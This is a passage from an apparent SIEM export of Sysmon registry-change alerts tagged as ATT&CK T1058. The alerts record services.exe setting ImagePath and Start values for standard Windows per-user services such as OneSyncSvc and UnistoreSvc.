for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.133392600Z"",""eventRecordID"":""597"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.424",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.133029100Z"",""eventRecordID"":""596"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.406",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.131971000Z"",""eventRecordID"":""595"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3eb7b\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.373",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.131666100Z"",""eventRecordID"":""594"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.346",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.128542700Z"",""eventRecordID"":""593"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 12:49:54.310",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.128309100Z"",""eventRecordID"":""592"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.296",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.127316800Z"",""eventRecordID"":""591"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.284",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.127076700Z"",""eventRecordID"":""590"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.264",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.126231100Z"",""eventRecordID"":""589"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.252",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.126016300Z"",""eventRecordID"":""588"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3eb7b\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:49:54.231",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.123674900Z"",""eventRecordID"":""587"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.217",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.123197400Z"",""eventRecordID"":""586"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.201",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.121634500Z"",""eventRecordID"":""585"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:49:54.187",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.120746300Z"",""eventRecordID"":""584"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.167",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.118775800Z"",""eventRecordID"":""583"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:49:54.144",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.118546900Z"",""eventRecordID"":""582"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 